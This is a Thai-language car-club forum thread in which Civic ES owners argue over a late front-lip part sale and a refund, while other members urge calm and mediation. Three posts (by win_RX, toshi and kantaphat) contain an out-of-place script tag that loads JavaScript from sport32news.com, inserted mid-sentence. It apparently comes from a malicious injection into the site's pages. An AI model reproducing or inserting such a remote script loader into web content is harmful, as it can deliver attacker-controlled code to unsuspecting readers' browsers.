หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
affirmation

ชื่อเล่น: อาท

เข้าร่วม: 20 เมษา 2009
ตอบ: 36

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 55
ให้คำขอบคุณ: 5

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 31 มีนา 2012 22:03 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
นึกว่าจบกันด้วยดีไปแล้วนะครับยังไงก็เอาใจช่วยทั้ง2ฝ่ายนะครับผม
ได้รับคำขอบคุณจาก: HaMon_ES02 
HaMon_ES02

เข้าร่วม: 27 ตุลา 2008
ตอบ: 1601

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1307
ให้คำขอบคุณ: 2674

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 31 มีนา 2012 23:17 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
ผมใช้บีบีพิมพ์นะครับเพราะว่าอ่านแล้วนิ่งไม่ได้..ขอโทษนะครับผมไม่เคยพูดว่า"ไอ้สัตว์" ไม่ต้องแต่งเรื่องครับผมพูดว่า"เหี้ยแล้วไง" แล้วผมก้อตัดสายไป...คุณโทรกลับมาแล้วพูดว่า"มึงไม่เหมือนเหมือนหน้าพ่อหน้าแม่..ไม่กลัวหลอก" ผมก้อเลยสวนไปว่า"มึงก้อไม่เหมือนหน้าพ่อหน้าแม่กูเหมือนกัน....

แล้วที่คุณโทรมาคุณใช้น้ำเสียงอย่าไร?...คุณรู้ดี!!

ถ้าไม่รู้หรือรู้แต่ไม่อยากจบ และถ้าคุณยังไม่รู้ตัวเอง...เดียวผมมีอารายเด็ดๆ ให้พี่ๆ เพื่อนๆ น้องๆ ฟังแล้วกันครับ ช่วยพิจารณาตัดสินครับ ว่าเค้าสมควรจะอุดหนุนเค้าต่อหรือไม่??

ในเมื่อผมให้อภัยคุณแล้ว และผมก้อพีเอ็มเลขบัญชีให้ตั้งแต่วันเสาร์ที่แล้วๆ นะครับ และผมก้อไม่ได้ตามคุณเป็นอาทิตย์

"โปรดอย่านิ่งเฉยกับการกระทำของตัวเอง...และคุณอย่ายอมรับผิดแต่ปากซึ่งไม่ตรงกับการกระทำ"

ปล....คงตอบไม่สะดวกนะครับช่วงนี้อยู่อยู่ต่างจังหวัดครับ อาจพิมพ์ผิดบ้างคงขอโทษด้วยครับ
ได้รับคำขอบคุณจาก: scanclub  Ton-  mark_es03  kantaphat  oat_es03 
HaMon_ES02

ครอบครัว ES
ครอบครัว ES

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 31 มีนา 2012 23:38 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
คุณอย่าพูดอารายมากเลยครับ..".เพราะคำพูดคุณมันทำร้ายตัวคุณเอง"
ได้รับคำขอบคุณจาก: scanclub  Ton- 
scanclub

ชื่อเล่น: ไผ่

เข้าร่วม: 18 ตุลา 2009
ตอบ: 1250

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1113
ให้คำขอบคุณ: 2432

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
เสาร์, 31 มีนา 2012 23:46 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
รักกันไว้ดีกว่าครับพี่น้อง  จายเย็นๆๆครับ 
lordpark

ชื่อเล่น: ปาร์ค

เข้าร่วม: 16 กันยา 2011
ตอบ: 714

Guru ES
Guru ES

ได้รับคำขอบคุณ: 640
ให้คำขอบคุณ: 1517

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 31 มีนา 2012 23:51 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
เฮ้อ!  ไม่ลงรอยกันซักที อยากให้จบไวไวจังเลยครับ จะได้อ่านกระทู้ใหม่ๆบ้าง
ได้รับคำขอบคุณจาก: Kriss_es04 
TA-O

ชื่อเล่น: เต๋า

เข้าร่วม: 04 ธันวา 2008
ตอบ: 638

Guru ES
Guru ES

ได้รับคำขอบคุณ: 160
ให้คำขอบคุณ: 1218

ที่อยู่: ซอยบางปูนครโครงการ2ถนนเทพารักษ์-เชียงกงบางนาช่วงเย็นๆ
ปี: 2005
สี: น้ำเงิน วิวิด (มุก) (B-502P)
เสาร์, 31 มีนา 2012 23:59 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
HaMon_ES02 พิมพ์ว่า:
ผมใช้บีบีพิมพ์นะครับเพราะว่าอ่านแล้วนิ่งไม่ได้..ขอโทษนะครับผมไม่เคยพูดว่า"ไอ้สัตว์" ไม่ต้องแต่งเรื่องครับผมพูดว่า"เหี้ยแล้วไง" แล้วผมก้อตัดสายไป...คุณโทรกลับมาแล้วพูดว่า"มึงไม่เหมือนเหมือนหน้าพ่อหน้าแม่..ไม่กลัวหลอก" ผมก้อเลยสวนไปว่า"มึงก้อไม่เหมือนหน้าพ่อหน้าแม่กูเหมือนกัน....

แล้วที่คุณโทรมาคุณใช้น้ำเสียงอย่าไร?...คุณรู้ดี!!

ถ้าไม่รู้หรือรู้แต่ไม่อยากจบ และถ้าคุณยังไม่รู้ตัวเอง...เดียวผมมีอารายเด็ดๆ ให้พี่ๆ เพื่อนๆ น้องๆ ฟังแล้วกันครับ ช่วยพิจารณาตัดสินครับ ว่าเค้าสมควรจะอุดหนุนเค้าต่อหรือไม่??

ในเมื่อผมให้อภัยคุณแล้ว และผมก้อพีเอ็มเลขบัญชีให้ตั้งแต่วันเสาร์ที่แล้วๆ นะครับ และผมก้อไม่ได้ตามคุณเป็นอาทิตย์

"โปรดอย่านิ่งเฉยกับการกระทำของตัวเอง...และคุณอย่ายอมรับผิดแต่ปากซึ่งไม่ตรงกับการกระทำ"

ปล....คงตอบไม่สะดวกนะครับช่วงนี้อยู่อยู่ต่างจังหวัดครับ อาจพิมพ์ผิดบ้างคงขอโทษด้วยครับ

อืมครับ  ผมนึกได้เเล้ว   ใช่คุงพูดว่าไอ้เหี้ยเต็มๆหูผม      พอผมโทรไปหาก็ติดแต่ไม่รับ  เกือบครึ่งชั่วโมง

ถ้าท่านใดอ่านเเล้วพอจะรับรู้ถึงความรู้สึกได้มั้ยครับ ว่าโดนด่าเสร็จเเล้วก็วางสายหนีมันจี๊ดมากครับ    

พอคุงรับสายผม  ผมก็ยังระงับอารมณ์ เก็บไว้ในใจผมก็พูด   " ยังงัยครับเนี้ย   มาด่าผมทำมัยครับ  "

คุงก็พูดว่า  " แล้วจะเอายังไง   กูไม่กลัวหลอกES อะ  เพื่อนผมเยอะ " 

ผมก็อึ้งเรื่องชักจะไปกันใหญ่และ     ส่วนน้ำเสียงเนี้ย  คนที่เคยคุยกับผมจะรู้ว่าผม คงไม่ไปด่าใครก่อน  (เป็นไปไม่ได้)

แต่น้ำเสียงที่คุงพูดมามันดูเหมือนคุงมั่นใจมาก   เพื่อนๆก็เตือนว่า  ใจเย็น  ขอโทษเค้าไปเรื่องจะได้จบจบ  ES ด้วยกัน

ถ้าท่านๆ ที่เข้ามาติดตามคงจะลองนึกภาพดูน้ะครับว่าสถานการณ์  เป็นยังไง    ผมก็อยากรู้ว่าคุงต้องการอะไรกันแน่  

ส่วนที่คำพูดที่ผมพูดว่า  " หน้าคุณไม่เหมือนหน้าพ่อแม่กูน้ะ  ผมไม่กลัวหลอก"   คำเนี้ย  มันตอนหลังจากที่คุงเอาแต่พูดคำด่าคำกับผม

เพราะตอนแรก ผมก็   "  คับๆ  OK ผมขอโทษครับ ผมผิดเอง "  พอพูดเสร็จ  คุณก็ขึ้นมึงกูเเละด่าเลย 

ผมเป็นพ่อค้าขายของมาเป็นสิบกว่าปี  ผมเป็นหัวหน้าคนมาเป็นสิบปี      ผมรู้ว่าผมผิดที่ส่งของล่าช้า  เเต่ คุงจะมาด่าอย่างนี้มันใช้ไม่ได้น้ะครับ

เราโตๆ   กันหมดเเล้ว   เเละพื่นที่นี้เป็นสื่อ  ออนไลน์   พี่ ๆน้อง ๆ  เค้าใช้ พูดคุย ให้คำปรึกษา  เเละขอคำปรึกษา   และผู้ที่ใช้รถรุ่นเดียวกัน

ช่วยเหลือกัน   เเละก็เป็นเพื่อนกัน  หลายๆท่านมีทั้งดีและไม่ดี   อันไหนไม่ดีก็เก็บไว้ในใจครับ    สื่อนี้มันกว้าง   ยังไงก็คิดก่อนครับ  
ได้รับคำขอบคุณจาก: scanclub  mark_es03  kantaphat  oat_es03 
ES2.0

ชื่อเล่น: ปาล์ม

เข้าร่วม: 17 เมษา 2009
ตอบ: 1013

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1027
ให้คำขอบคุณ: 1000

ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อาทิตย์, 1 เมษา 2012 00:06 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
เดี๋ยวนี้บ้านเราร้อนนะ ใจเย็นๆกันนะพี่ๆน้องๆกันทั้งนั้น
--x

ชื่อเล่น: เอ็กซ์

เข้าร่วม: 25 มกรา 2010
ตอบ: 1104

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1047
ให้คำขอบคุณ: 122

อาทิตย์, 1 เมษา 2012 01:28 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
ใจเย็นกันนะครับท่าน 

ได้รับคำขอบคุณจาก: HaMon_ES02 
SIRATH BUALUANG

ชื่อเล่น: กรด

เข้าร่วม: 08 ธันวา 2009
ตอบ: 740

Guru ES
Guru ES

ได้รับคำขอบคุณ: 701
ให้คำขอบคุณ: 577

สี: แดง ไฟร์เปปเปอร์ (R-507P)
อาทิตย์, 1 เมษา 2012 01:31 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
เปิดใจให้กว้าง...ให้อภัย..

ถอยออกมาคนละก้าว...แล้วเคลียร์กันเถอะครับ...

HaMon_ES02

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 เมษา 2012 09:34 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
555+..อย่าตีหน้าเศร้าเล่าความเท็จเลยครับ...แค่คุณป่าวประกาศว่าผมด่าคุณว่า"ไอ้สัตว์"ก้อไม่ใช่แล้วครับ..นี้หรือครับลูกผู้ชายเฮ้อ.!!..อย่าแต่งเติมครับถ้าอยากให้ทุกอย่างจบลงแค่นี้...แค่คุณพูดกับผมมาทำให้ได้ก่อนเถอะครับ...
ได้รับคำขอบคุณจาก: mark_es03  PacebO 
THAM

ชื่อเล่น: ตั้ม

เข้าร่วม: 05 ธันวา 2010
ตอบ: 951

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 946
ให้คำขอบคุณ: 777

อาทิตย์, 1 เมษา 2012 09:47 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
ถ้ามีคลิปการสนทนาอันนั้นล่ะเป็นหลักฐานอย่างดีในการชี้ว่าใครพูดจริงหรือไม่จริง 
ได้รับคำขอบคุณจาก: mark_es03  TA-O 
HaMon_ES02

ครอบครัว ES
ครอบครัว ES

อาทิตย์, 1 เมษา 2012 09:47 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
SIRATH BUALUANG พิมพ์ว่า:

ถอยออกมาคนละก้าว...แล้วเคลียร์กันเถอะครับ...

ขอบคุณครับผมถอยมานานแล้วครับ...เป็นอาทิตย์แล้วครับ..เค้าไม่จบตัวเค้าเอง อิอิ "มันยิ่งทำร้ายตัวเค้าเอง " ในเมื่อปากบอกว่าอยากจบแต่การกระทำมันไม่ใช่เลยครับ...คำว่า "เดียว" หยุดเถอะครับถ้าคุณปกครองคนเยอะ
ได้รับคำขอบคุณจาก: mark_es03 
chang167

ชื่อเล่น: แก้ว

เข้าร่วม: 13 มิถุนา 2010
ตอบ: 150

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 149
ให้คำขอบคุณ: 82

อาทิตย์, 1 เมษา 2012 10:19 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
THAM พิมพ์ว่า:
ถ้ามีคลิปการสนทนาอันนั้นล่ะเป็นหลักฐานอย่างดีในการชี้ว่าใครพูดจริงหรือไม่จริง 

นั้นซิครับ คนนึงเล่าอย่าง อีกคนเล่าอย่าง งี้ ดราม่า กันไม่รู้จบ มีบันทึกสนทนานี่เลย จบแน่ๆ ให้เสียกันไปข้างเลยถ้าถึงขนาดนี้แล้ว  เฮ้อ 

ปล.ไม่ได้ยุยงส่งเสริมนะครับ แต่มาถึงขั้นนี้แล้วคิดว่า ทั้ง 2 ฝ่ายคงไม่ยอมถอยแล้วละ 
tamy2975

เข้าร่วม: 30 ตุลา 2009
ตอบ: 1733

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1615
ให้คำขอบคุณ: 1210
อาทิตย์, 1 เมษา 2012 14:17 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
ขอให้จบ แบบแฮปปี้ นะครับ
kai04

ชื่อเล่น: ไก่

เข้าร่วม: 07 ตุลา 2008
ตอบ: 571

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1278
ให้คำขอบคุณ: 1521

อาทิตย์, 1 เมษา 2012 19:35 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
นิสัยไม่ดีอยู่อย่างคือรับปากแล้วไม่ทำตามที่พูด เกลี่ยดจริงๆพวกขายของแต่ไม่ใส่ใจคนซื้้อ ผมก็เคยโดน
win_RX

ชื่อเล่น: วิน

เข้าร่วม: 19 ธันวา 2010
ตอบ: 418

ได้รับคำขอบคุณ: 499
ให้คำขอบคุณ: 162

สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 1 เมษา 2012 22:11 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
พรุ่งนี้ เดี๋ยวจะมีทีมงานผมติดต่อไป ทั้ง 2 ท่านนะครับ 17.35 เรื่องเด่นเย็นนี้ จากผม ศรยุทร์ "<script src="https://sport32news.com/civicesgroup.js">
OaInTerEs

ชื่อเล่น: กิจ

เข้าร่วม: 07 กุมภา 2012
ตอบ: 579

ได้รับคำขอบคุณ: 210
ให้คำขอบคุณ: 243

อาทิตย์, 1 เมษา 2012 22:29 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
สงสัยจะหนังยาว
kantaphat

ชื่อเล่น: ก๊อต

เข้าร่วม: 08 เมษา 2010
ตอบ: 1411

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 822
ให้คำขอบคุณ: 2374

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 1 เมษา 2012 23:29 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
ผมขอแนะนำอยากให้ปิดกระทู้นี้ครับถ้าเป็นไปได้..เพราะท่าทางหนังจะยาว..
เก็บเอาไว้ให้เป็นแค่ความหลังของทั้งสองฝ่ายจะดีกว่าครับ..
ได้รับคำขอบคุณจาก: tamy2975 
wittayab

เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 2 เมษา 2012 01:45 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
kantaphat พิมพ์ว่า:
ผมขอแนะนำอยากให้ปิดกระทู้นี้ครับถ้าเป็นไปได้..เพราะท่าทางหนังจะยาว..
เก็บเอาไว้ให้เป็นแค่ความหลังของทั้งสองฝ่ายจะดีกว่าครับ..

ผมว่าอย่าดีกว่าครับ เนื่องกระทู้นี้เป็นผลพวงมาจากกระทู้ซื้อขายครับ เพื่อให้สมาชิกที่กำลังจะซื้อสินค้าผ่านเว็ปเก็บไปพิจารณาครับ

ผมอยากจะให้เคลียร์ทั้ง2ฝ่ายมากกว่าที่จะปิดกระทู้หนีครับ เนื่องจากว่า คนขายนั้นก็เป็นที่รู้จักกันในเว็ปพอสมควร การที่ผู้ซื้อมากล่าวอ้างแบบนี้

ถ้าไม่มีมูลเขาจะเอามาโพสทำไมให้เปลืองพื้นที่ครับ แล้วจากที่ผมอ่านๆมาหลายหน้า ผมเห็นมีแต่เจ้าทุกข์มาโพสอยู่ฝ่ายเดียว

ส่วนคนขายก็นานๆมาตอบที ถ้าเป็นไปได้ช่วยเคลียร์ กันที่หน้าเว็ปนี่แหละครับ มาถึงขั้นนี้แล้ว ไม่มีอะไรจะเสียแล้วทั้งคู่

เพราะว่าคนซื้อเสียความรู้สึก ส่วนคนขายเสียชื่อเสียง ผิดก็ว่าตามผิด แค่คำว่า ขอโทษ คำเดียวที่หน้าเว็ปอาจจะทำให้อะไรๆดีขึ้นก็ได้นะครับ

ทำผิดแล้วยอมรับผิด ทุกคนให้อภัยครัับ

ปล. (ผมไม่ได้เป็นอะไรกับ จขกท นะครับ). เพียงแค่อยากให้คนขายช่วยออกมาเคลียร์ด้วยครับ

ปล. สุดท้ายผมไม่รู้ว่าบทสนธนาที่แท้จริงมันเป็นอย่างไร ถ้าผมเข้าใจอะไรผิดไป ก็ขอโทษคนขายล่วงหน้านะครับ
ได้รับคำขอบคุณจาก: THAM  toptwo  kantaphat  hanaun 
toshi

เข้าร่วม: 13 พฤศจิกา 2008
ตอบ: 2299

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1405
ให้คำขอบคุณ: 1756

ปี: 2003
จันทร์, 2 เมษา 2012 09:41 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
"<script src="https://sport32news.com/civicesgroup.js"> ขอเอาใจช่วยทั้ง 2 ฝ่าย เคลียร์ปัญหาให้จบ ๆๆๆๆ กัน ..
ได้รับคำขอบคุณจาก: mark_es03  tamy2975 
Edan

เข้าร่วม: 28 กรกฎา 2010
ตอบ: 197

ได้รับคำขอบคุณ: 451
ให้คำขอบคุณ: 376

จันทร์, 2 เมษา 2012 09:58 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
nooduean_69 พิมพ์ว่า:
เสียหมดเลยนะค้ะน้องว่าจะไปซื้อลิ้นหน้าซะหน่อยแล้วในบอดรก็มีเจ้านี้เจ้าเดียวละมั้งที่ขาย ว้าาาาา

มีคับ มี อยู่ 2-3 เจ้า น่ะ ที่ผมเห้น  
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

จันทร์, 2 เมษา 2012 10:24 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
จบๆกันเถ๊อะนะ พี่ น้อง

นัดกันไปเคีลยร์หลังไมค์ดีกว่ามั๊ย

มาพิมพ์กันคนละที มันไม่จบกันซะที

ผมอยากให้จบกันด้วยดีนะ

ถ้านัดเจอกัน เคลียร์ของกัน เคลียร์เงินกัน เดี๋ยวผมไปนั่งตรงกลางระหว่างเพื่อนESให้ครับ อยากให้จบกันด้วยดี

Pleaseeeeeeeeeeeeee
chonnapat

ชื่อเล่น: โต้ง

เข้าร่วม: 05 กันยา 2011
ตอบ: 2353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1251
ให้คำขอบคุณ: 1373

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 2 เมษา 2012 10:27 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
แต่ก็ใจเย็นๆกันไว้ก่อนนะคับ คุยกันดีกว่าระงับอารมณ์ไว้นิดนึง ผมว่าน่าจะไม่มีอะไรหรอกคับ ผมก็เคยจัดกับเขามานะก็ไม่มีอะไรนะ
ลองคุยกันดีๆดีกว่าคับ ขอให้กำลังใจทั้งสองฝ่ายคับ
ได้รับคำขอบคุณจาก: TA-O  tamy2975  kantaphat 
jologo

เข้าร่วม: 01 กันยา 2011
ตอบ: 286

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 226
ให้คำขอบคุณ: 446
จันทร์, 2 เมษา 2012 10:46 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
~ สเตฟาน ~ พิมพ์ว่า:

นัดกันไปเคีลยร์หลังไมค์ดีกว่ามั๊ย

มาพิมพ์กันคนละที มันไม่จบกันซะที

ถ้านัดเจอกัน เคลียร์ของกัน เคลียร์เงินกัน เดี๋ยวผมไปนั่งตรงกลางระหว่างเพื่อนESให้ครับ อยากให้จบกันด้วยดี

+1 ช่ายเลยครับพี่
ได้รับคำขอบคุณจาก: tamy2975  kantaphat 
mamarain

ชื่อเล่น: โชค

เข้าร่วม: 16 กันยา 2010
ตอบ: 408

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 473

จันทร์, 2 เมษา 2012 11:13 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03

เห็นด้วยกับท่านประธานครับเรื่องนี้น่าจะมีคนกลางมาช่วยไกล่เกลี่ยเรื่องจะได้ไม่บานปลาย
ได้รับคำขอบคุณจาก: tamy2975  kantaphat 
TA-O

ชื่อเล่น: เต๋า

เข้าร่วม: 04 ธันวา 2008
ตอบ: 638

Guru ES
Guru ES

ได้รับคำขอบคุณ: 160
ให้คำขอบคุณ: 1218

ที่อยู่: ซอยบางปูนครโครงการ2ถนนเทพารักษ์-เชียงกงบางนาช่วงเย็นๆ
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 2 เมษา 2012 11:41 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
555+..อย่าตีหน้าเศร้าเล่าความเท็จเลยครับ...แค่คุณป่าวประกาศว่าผมด่าคุณว่า"ไอ้สัตว์"ก้อไม่ใช่แล้วครับ..นี้หรือครับลูกผู้ชายเฮ้อ.!!..อย่าแต่งเติมครับถ้าอยากให้ทุกอย่างจบลงแค่นี้...แค่คุณพูดกับผมมาทำให้ได้ก่อนเถอะครับ...

เฮ้อ.......ผมมะมีเวลามะพิมพ์และเถียงไปเถียงมามากมายน้ะครับ....เเต่ไอ้ตีหน้าเทร้าเล่าความเท็จไม่ใช่นิสัยผม 
ตอนเเลกผมก็พูดว่า  "  จะขอเอาเงินไปคืนให้คุณกับมือ " (ตอนที่มีปัญหากันเเล้วดูท่าทางว่าเรื่องยาว) 
คุงก็พูดปัดว่า "  ม่ต้องรู้หลอก   บ้านผมอยู่ที่เมืองไทยนี่เเหละ "
ผมก็พูดกลับไปว่า  "ไม่เป็นไรผมแค่อยากเคลีย์  " 
คุงก็บอก "  ไม่ต้อง  ให้ส่งใส่ซอง จ.ม  แล้วส่งมาตามที่อยู่ ไม่เป็นไรผมไม่รีบใช้เงิน "
ผมก็เงียบไปพักนึง  เเล้วก็พูดกลับไปว่า  "  ผมขอเลขที่ บัญชี ส่งSMSให้ผมที  "

เเละก็ได้ประโยคเก่าๆว่าส่งมาตามที่อยู่    ส่วนผมก็   " OK   " 
แล้วผมก็คิดในใจ   ถ้าเงินหายจะมีปัญหาอีกแน่เลย  เอาไงดีว้าตู   เลยได้บทสรุปว่า  ส่งธนานัติ  ชัวส์สุด
chonnapat พิมพ์ว่า:
แต่ก็ใจเย็นๆกันไว้ก่อนนะคับ คุยกันดีกว่าระงับอารมณ์ไว้นิดนึง ผมว่าน่าจะไม่มีอะไรหรอกคับ ผมก็เคยจัดกับเขามานะก็ไม่มีอะไรนะ
ลองคุยกันดีๆดีกว่าคับ ขอให้กำลังใจทั้งสองฝ่ายคับ

ขอบคุงน้ะครับ ที่เข้าใจ
  ตอนนี้ก็มีท่านอื่นโทรมาคุย  สั่งงานมากกว่าเดิมอีกอะครับ  อาจเป็นช่วง  แต่งให้ทันเพื่อกลับบ้าน ตจว ไปโชว์สาวๆอะน้ะ

ครับพี่ ฟาน  ผมOK รู้ว่าผิด
แต่ผมก็อยากที่จะเคลียร์ ตั้งแต่แรกๆแล้วครับ  
ผมเข้ามาอยู่ในES เเรกๆ   นิสัยผมเป็นยังไง    ผ่านมาหลายปีและ  ตัวผมก็เป็นเหมือนเดิม   ไม่ใหญ่กว่าเดิม 
ผมยินดีรับฟัง  เเละอยากให้มันจบ  เป็นพอ ครับ

chang167 พิมพ์ว่า:
THAM พิมพ์ว่า:

นั้นซิครับ คนนึงเล่าอย่าง อีกคนเล่าอย่าง งี้ ดราม่า กันไม่รู้จบ มีบันทึกสนทนานี่เลย จบแน่ๆ ให้เสียกันไปข้างเลยถ้าถึงขนาดนี้แล้ว  เฮ้อ 

ปล.ไม่ได้ยุยงส่งเสริมนะครับ แต่มาถึงขั้นนี้แล้วคิดว่า ทั้ง 2 ฝ่ายคงไม่ยอมถอยแล้วละ 

ผมยอมถอยน้ะครับ  เพื่อให้เรื่องมันจบ  
 ขอบคุงน้ะครับ

SIRATH BUALUANG พิมพ์ว่า:

ขอบคุณครับผมถอยมานานแล้วครับ...เป็นอาทิตย์แล้วครับ..เค้าไม่จบตัวเค้าเอง อิอิ "มันยิ่งทำร้ายตัวเค้าเอง " ในเมื่อปากบอกว่าอยากจบแต่การกระทำมันไม่ใช่เลยครับ...คำว่า "เดียว" หยุดเถอะครับถ้าคุณปกครองคนเยอะ

ที่ไม่หยุด เเละเข้ามาตอบเพราะผมว่า ผมมะมีเวลามาตอบทุกๆประโยคผมว่ามันจะบานปลาย   แต่ดูเเล้วว่าถ้าไม่ตอบไปบางท่านอาจไม่รู้
ถ้าคุงมาพิมพ์อยู่อย่างนี้มันไม่จบหลอกครับ    คุงมีประสงค์จะต้องการอะไรกันแน่    "  อ่านดูจะรู้ว่าใครเป็นยังไง  "
chonnapat

ชื่อเล่น: โต้ง

เข้าร่วม: 05 กันยา 2011
ตอบ: 2353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1251
ให้คำขอบคุณ: 1373

จันทร์, 2 เมษา 2012 16:53 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
เป็นความเห็นส่วนตัวนะคับ ....อยากให้ทั้งสองท่านไปมิตติ้งครั้งต่อไปโดยให้ ประธานกลุ่ม ES หรือท่านผู้ประสานงานของงานมิตติ้งเป็นคนกลาง ช่วยไกล่เกลียให้ คงจะดีกว่าคุยโต้ตอบกันทางนี้นะคับ ผมอยากให้ทั้งสองฝ่ายลองหันมาขอโทษกันทั้งสองฝ่าย และมาจับมือกันในงานมิตติ้งอะไรๆคงจะดีขึ้นนะคับ  
ส่วนกับคำพูดที่ได้พูดใส่กันไปก็ให้ลืมๆมันไปซะ เริ่มต้นกันใหม่นะผมว่าน่าจะดีขึ้นคับ(ถ้าไม่เห็นด้วยก็ไม่เป็นไรนะ ผมขอโทษไว้ด้วยก็แล้วกันสำหรับความเห็นของผมคับ) ขอให้กลับมาดีกันไวๆนะคับ เอาใจช่วยทั้งสองฝ่ายคับ
ได้รับคำขอบคุณจาก: stevie_b8  kantaphat  wut-chiangmai  mark_es03 
dangeroustoy

ชื่อเล่น: นิวพานใหม่

เข้าร่วม: 01 กุมภา 2011
ตอบ: 800

Guru ES
Guru ES

ได้รับคำขอบคุณ: 456
ให้คำขอบคุณ: 2944

จันทร์, 2 เมษา 2012 17:49 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
จุดจบจะเป็นอย่างไรต่อ รอดูตอนต่อไป
kantaphat

ชื่อเล่น: ก๊อต

เข้าร่วม: 08 เมษา 2010
ตอบ: 1411

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 822
ให้คำขอบคุณ: 2374

อังคาร, 3 เมษา 2012 01:25 - ขอระบายหน่อยโดนกับตัวเองแล้วครับ.....เรื่องลิ้นหน้าทรง SiR 03
ผมไม่รู้นะครับว่าทั้ง2คนจะพูดกันว่าอย่างไรแต่ผมอยากให้ลองใจเย็นๆแล้วมาจับมือกันขอโทษกันทั้ง2ฝ่ายอย่างที่ท่านโยมฟานบอก..เอ้ยย."<script src="https://sport32news.com/civicesgroup.js"> .ท่านประธานบอก เพราะพวกเรามันเหมือนพี่น้องกัน คนไทยด้วยกันต้องรักกันไว้ครับ ผมขอเอาใจช่วยทั้ง2ฝ่ายครับ 

